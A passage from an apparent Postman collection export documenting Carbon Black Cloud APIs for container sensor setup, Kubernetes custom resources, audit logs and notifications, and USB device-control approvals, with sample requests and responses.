Key"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/cli_instances/setup_command"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 02 Oct 2023 13:44:57 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"280"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"2ca58bf9-7df3-493a-8a31-f83289ea23fc"}],"cookie":[],"responseTime":null,"body":"{\n    \"command\": \"\\nmkdir -p ~/.cbctl\\ncat > ~/.cbctl/.cbctl.yaml <<EOF\\nactive_user_profile: cbctl_default\\ncbctl_default:\\n  cb_api_id: $CONNECTOR_ID\\n  cb_api_key: $API_KEY\\n  org_key: $ORG_KEY\\n  saas_url: $ENV_URL\\n  default_build_step: $DEFAULT_BUILD_STEP\\nEOF\\n\"\n}"}],"_postman_id":"77803ba8-53ac-4cf4-950e-933c15bca401"},{"name":"Create Custom Resource","id":"33cf2ce5-21dd-43ab-aaf4-f4de79cce745","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"sensor_version\": \"main\",\n    \"domain\": \"john:john-eks-frankfurt\",\n    \"api_host\": \"defense-dev01.cbdtest.io\",\n    \"adapter_name\": \"containers\",\n    \"gateway_host\": \"events.myserver.dev.containers.mydomain.io\",\n    \"runtime_gateway_host\": \"runtime.events.myserver.dev.containers.mydomain.io\",\n    \"cluster_labels\": {},\n    \"agent_components\": {\n        \"runtime_protection\": true,\n        \"cluster_scanning\": true\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/kubernetes_resource_definitions","description":"<h3 id=\"create-custom-resource\">Create Custom Resource</h3>\n<p>Generates a YAML definition for a Kubernetes Custom Resource for the Carbon Black Containers’ CRD (as deployed by the Carbon Black Containers Operator installation). The CR definition will be hosted by CBC for some time and can be applied directly on the cluster via <code>kubectl</code> or similar tools.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>CREATE, READ, UPDATE, DELETE, EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"domain\": \"&lt;string&gt;\",\n  \"sensor_version\": \"&lt;string&gt;\",\n  \"api_host\": \"&lt;string&gt;\",\n  \"adapter_name\": \"&lt;string&gt;\",\n  \"gateway_host\": \"&lt;string&gt;\",\n  \"runtime_gateway_host\": \"&lt;string&gt;\",\n  \"agent_components\": \"&lt;object&gt;\",\n  \"cluster_labels\": \"&lt;object&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container/latest/setup-api/#create-custom-resource\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{org_key}}","deploy","kubernetes_resource_definitions"],"host":["{{cbc-hostname}}"],"query":[],"variable":[]}},"response":[{"id":"8fa00647-5f73-41c6-8b2b-ba3329e61e24","name":"Create Custom Resource","originalRequest":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"sensor_version\": \"main\",\n    \"domain\": \"john:john-eks-frankfurt\",\n    \"api_host\": \"defense-dev01.cbdtest.io\",\n    \"adapter_name\": \"containers\",\n    \"gateway_host\": \"events.myserver.dev.containers.mydomain.io\",\n    \"runtime_gateway_host\": \"runtime.events.myserver.dev.containers.mydomain.io\",\n    \"cluster_labels\": {},\n    \"agent_components\": {\n        \"runtime_protection\": true,\n        \"cluster_scanning\": true\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/kubernetes_resource_definitions"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 03 Oct 2023 14:12:21 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"721"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"414d4c86-e95d-4c02-b528-47bfce51f9ce"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"cr-1a8de808-71f9-454d-8435-444b4878f67a\",\n    \"resource_yaml\": \"apiVersion: operator.containers.carbonblack.io/v1\\nkind: CBContainersAgent\\nmetadata:\\n  name: cbcontainers-agent\\nspec:\\n  account: ABCDE12345\\n  clusterName: john:john-eks-frankfurt\\n  version: \\\"main\\\"\\n  gateways:\\n    apiGateway:\\n      host: defense-dev01.cbdtest.io\\n      adapter: containers\\n    coreEventsGateway:\\n      host: events.myserver.dev.containers.mydomain.io\\n    hardeningEventsGateway:\\n      host: events.myserver.dev.containers.mydomain.io\\n    runtimeEventsGateway:\\n      host: runtime.events.myserver.dev.containers.mydomain.io \\n\\n\",\n    \"resource_url\": \"setup.test.containers.carbonblack.io/cr-1a8de808-71f9-454d-8435-444b4878f67a\"\n}"}],"_postman_id":"33cf2ce5-21dd-43ab-aaf4-f4de79cce745"},{"name":"Check Status of a Custom Resource","id":"c46a4f3f-cb27-478c-be1d-a6aa1044fefb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/kubernetes_resource_definitions/{{id}}","description":"<h3 id=\"check-status-of-a-custom-resource\">Check Status of a Custom Resource</h3>\n<p>Checks whether a Custom resource is still available on the Carbon black host location.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>CREATE, READ, UPDATE, DELETE, EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container/latest/setup-api/#check-status-of-a-custom-resource\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{org_key}}","deploy","kubernetes_resource_definitions","{{id}}"],"host":["{{cbc-hostname}}"],"query":[],"variable":[]}},"response":[{"id":"0cebd48a-9d64-46f3-a55a-c6942389570e","name":"Check Status of a Custom Resource","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/kubernetes_resource_definitions/{{id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 03 Oct 2023 14:13:42 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"721"},{"key":"Connection","value":"close"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"26387c8c-0a0f-4ea1-8e50-30d741011853"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"cr-1a8de808-71f9-454d-8435-444b4878f67a\",\n    \"resource_yaml\": \"apiVersion: operator.containers.carbonblack.io/v1\\nkind: CBContainersAgent\\nmetadata:\\n  name: cbcontainers-agent\\nspec:\\n  account: ABCDE12345\\n  clusterName: john:john-eks-frankfurt\\n  version: \\\"main\\\"\\n  gateways:\\n    apiGateway:\\n      host: defense-dev01.cbdtest.io\\n      adapter: containers\\n    coreEventsGateway:\\n      host: events.myserver.dev.containers.mydomain.io\\n    hardeningEventsGateway:\\n      host: events.myserver.dev.containers.mydomain.io\\n    runtimeEventsGateway:\\n      host: runtime.events.myserver.dev.containers.mydomain.io \\n\\n\",\n    \"resource_url\": \"setup.test.containers.carbonblack.io/cr-1a8de808-71f9-454d-8435-444b4878f67a\"\n}"}],"_postman_id":"c46a4f3f-cb27-478c-be1d-a6aa1044fefb"}],"id":"51a2b410-9237-450f-9332-f62a1c3bef9e","_postman_id":"51a2b410-9237-450f-9332-f62a1c3bef9e","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"6647c570-a363-4bc0-92ef-d8c10d055813","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"1ea97417-8d5e-4eb2-a8ea-22a7205f7457"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"232be4e4-6c95-48df-a24d-f4ba2af7db88"}}],"_postman_id":"6647c570-a363-4bc0-92ef-d8c10d055813","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Endpoint Standard API (NGAV)","item":[{"name":"Audit Log and Notifications","item":[{"name":"Audit Log Events","id":"81b403bc-dfa4-4654-a5bf-95819e67d8cf","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":false},"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/auditlogs","description":"<p>Retrieves all <strong>new</strong> audit log notifications matching the input search criteria. Response is a list of events in JSON format, sorted by time in ascending order (oldest notification first). Once a notification is viewed/ingested, it is cleared and will not be included in future responses to this API request.</p>\n<p>In June 2023, the Audit Log API was updated to accept an API key of type Custom, in addition to the (now deprecated) type API.</p>\n<p>The response will include various types of notifications such as:</p>\n<ul>\n<li>Log in attempts by users</li>\n<li>Updates to connectors</li>\n<li>Creation of connectors</li>\n<li>LiveResponse events</li>\n</ul>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#audit-log-events\">See the Documentation</a></p>\n","urlObject":{"path":["integrationServices","v3","auditlogs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"81b403bc-dfa4-4654-a5bf-95819e67d8cf"},{"name":"Get Notifications 🗝","id":"81bcf008-f68c-42cb-ac34-684a17e3e099","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_siem_key}}/{{cb_siem_id}}"}]},"isInherited":false},"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/notification","description":"<p>Get new notifications since last checkin. The connector must be subscribed to at least one notification rule to get notifications.</p>\n<p>Note that, once delivered, notifications will not be delivered again. Also, the API key associated with the request to the Notifications API must be of the “SIEM” type - “API” key types will return a HTTP 401 Unauthorized when attempting to access the notifications API.</p>\n<p>Every SIEM key type can be subscribed to a different set of notifications in the product. Therefore, each SIEM key type will have a different “view” of the notifications available. Each SIEM key is considered separate from the others, and even if both are subscribed to the same set of notifications, the notifications will be delivered to both – retrieving a notification from one SIEM key will not automatically “remove” it from the view of the other SIEM key.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#get-notifications\">See the Documentation</a></p>\n","urlObject":{"path":["integrationServices","v3","notification"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"81bcf008-f68c-42cb-ac34-684a17e3e099"}],"id":"7613291f-eaac-4884-91e2-5802d2203051","description":"<p>The Audit Log and Notifications APIs both function as read-once queues.</p>\n<p>Information on how the APIs work and Authentication is on the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/\">Developer Network</a>.</p>\n<h2 id=\"audit-log\"><strong>Audit Log</strong></h2>\n<p>Requires an API Key of type \"Custom\" with the permission org.audits.</p>\n<p>The key type \"API\" has been deprecated in June 2023 and will be supported for 12 months until July 2024.</p>\n<p>Retrieves all <strong>new</strong> audit log notifications matching the input search criteria. Response is a list of events in JSON format, sorted by time in ascending order (oldest notification first). Once a notification is viewed/ingested, it is cleared and will not be included in future responses to this API request.</p>\n<h2 id=\"notification-api\"><strong>Notification API</strong></h2>\n<p>Requires an API Key of type \"SIEM\".</p>\n<p>Notifications API allows consumers to get alert and policy action notifications that a connector is subscribed to.</p>\n<p><em>Note: Only CB Analytics and Watchlist alert notifications can be retrieved through the notifications API.</em></p>\n<p><strong>New integrations should use one of the following to receive all available data:</strong></p>\n<p>* <a href=\"http://localhost:1313/reference/carbon-black-cloud/platform/latest/data-forwarder-config-api\">Data (Event) Forwarder</a> to stream alerts or events to your own S3 bucket, where you can control retention<br />* <a href=\"http://localhost:1313/reference/carbon-black-cloud/platform/latest/alerts-api/\">Alerts v6 API</a> to search up to 180 days of historical alert data</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_key}}/{{cb_api_id}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"1557bcc9-f8f2-47ed-9051-67afe29666a7"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"aa4b9fca-6423-44c0-8974-ffc82a92cc72"}}],"_postman_id":"7613291f-eaac-4884-91e2-5802d2203051"},{"name":"Device Control API 🗝","item":[{"name":"Approvals","item":[{"name":"Bulk Create Approvals","id":"d83512f8-e639-401b-a986-d17322be61c6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n  {\n    \"approval_name\": \"string\",\n    \"notes\": \"string\",\n    \"product_id\": \"string\",\n    \"serial_number\": \"string\",\n    \"vendor_id\": \"string\"\n  }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/approvals/_bulk","description":"<p>Create multiple USB device approvals. Supports either JSON or CSV.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#bulk-create-approvals\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","approvals","_bulk"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"d83512f8-e639-401b-a986-d17322be61c6"},{"name":"Get Approval by ID","id":"c31eeb03-79f8-4527-a5a8-2f410b5113f4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/approvals/{{cb_device_control_id}}","description":"<p>Returns a specific approval.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#get-approval-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","approvals","{{cb_device_control_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"6cde45f4-a258-47fe-988b-35edb1018208","name":"Get Approval by ID","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/approvals/{{cb_device_control_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 11 Dec 2023 22:08:17 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"235"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"be80bd48-c694-310b-a1be-38431e04b160\",\n    \"vendor_id\": \"0x0781\",\n    \"vendor_name\": \"SanDisk\",\n    \"product_id\": \"0x5567\",\n    \"product_name\": \"Cruzer Blade\",\n    \"serial_number\": \"4C530001191234567890\",\n    \"updated_by\": \"demo@sampleorg.com\",\n    \"notes\": \"\",\n    \"approval_name\": \"Demo Approval\",\n    \"created_at\": \"2023-12-11T22:07:16Z\",\n    \"updated_at\": \"2023-12-11T22:07:16Z\"\n}"}],"_postman_id":"c31eeb03-79f8-4527-a5a8-2f410b5113f4"},{"name":"Search Approvals","id":"6ea20216-496c-4b7f-b85d-016260ea9c41","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"device.id\": [\n      \"string\"\n    ],\n    \"product_name\": [\n      \"string\"\n    ],\n    \"vendor_name\": [\n      \"string\"\n    ]\n  },\n  \"query\": \"string\",\n  \"rows\": 0,\n  \"start\": 0\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/approvals/_search","description":"<p>Search for approvals using a set of criteria.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#search-approvals\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","approvals","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"9c6d6a72-911a-49c3-bd66-88157080f9b8","name":"Search Approvals","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"product_name\": [\n            \"Cruzer Blade\"\n        ],\n        \"vendor_name\": [\n            \"SanDisk\"\n        ]\n    },\n    \"rows\": 1,\n    \"start\": 0\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/approvals/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 11 Dec 2023 22:08:56 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"477"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 4,\n    \"num_available\": 4,\n    \"results\": [\n        {\n            \"id\": \"be80bd48-c694-310b-a1be-38431e04b160\",\n            \"vendor_id\": \"0x0781\",\n            \"vendor_name\": \"SanDisk\",\n            \"product_id\": \"0x5567\",\n            \"product_name\": \"Cruzer Blade\",\n            \"serial_number\": \"4C530001191234567890\",\n            \"updated_by\": \"demo@sampleorg.com\",\n            \"notes\": \"\",\n            \"approval_name\": \"Demo Approval\",\n            \"created_at\": \"2023-12-11T22:07:16Z\",\n            \"updated_at\": \"2023-12-11T22:07:16Z\"\n        }\n    ]\n}"}],"_postman_id":"6ea20216-496c-4b7f-b85d-016260ea9c41"},{"name":"Update Approval","id":"a550b811-e88b-47cb-92c5-40d3fc8ec730","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n  \"approval_name\": \"string\",\n  \"created_at\": \"string\",\n  \"id\": \"string\",\n  \"notes\": \"string\",\n  \"product_id\": \"string\",\n  \"product_name\": \"string\",\n  \"serial_number\": \"string\",\n  \"updated_at\": \"string\",\n  \"updated_by\": \"string\",\n  \"vendor_id\": \"string\",\n  \"vendor_name\": \"string\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/approvals/{{cb_device_control_id}}","description":"<p>Update an existing approval for a single USB device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#update-approval\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","approvals","{{cb_device_control_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a550b811-e88b-47cb-92c5-40d3fc8ec730"},{"name":"Delete Approval by ID","id":"a04220ac-c0b1-420b-b4b1-90c00cd1bf91","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/approvals/{{cb_device_control_id}}","description":"<p>Deletes a specific approval.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#delete-approval-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","approvals","{{cb_device_control_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a04220ac-c0b1-420b-b4b1-90c00cd1bf91"},{"name":"Export USB Approvals Export","id":"bd112d81-a040-4957-97eb-3935cf594a94","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"vendor_name\": [\n            \"SanDisk\"\n        ]\n    },\n    \"format\": \"json\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/approvals/_export","description":"<p>Extract USB device approval data programmatically in <code>csv</code> or <code>json</code> format.</p>\n<p>To receive the actual JSON or CSV results, use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a>. First, use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/#get-job-details\">Get Job Details</a> to get the status of the async job, then <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/#download-job-output\">Download Job Output</a> call to download the actual content.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#export-usb-devices-approval\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","approvals","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"8d4150b7-22db-4db9-b4e6-83111fb3d551","name":"Export USB Approvals Export","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"vendor_name\": [\n            \"SanDisk\"\n        ]\n    },\n    \"format\": \"csv\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/approvals/_export"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 13 Jul 2023 15:55:58 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"19"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": 7895681\n}"},{"id":"b13b1ac6-c9d1-4348-b1dd-817516a684d7","name":"Download Job Output 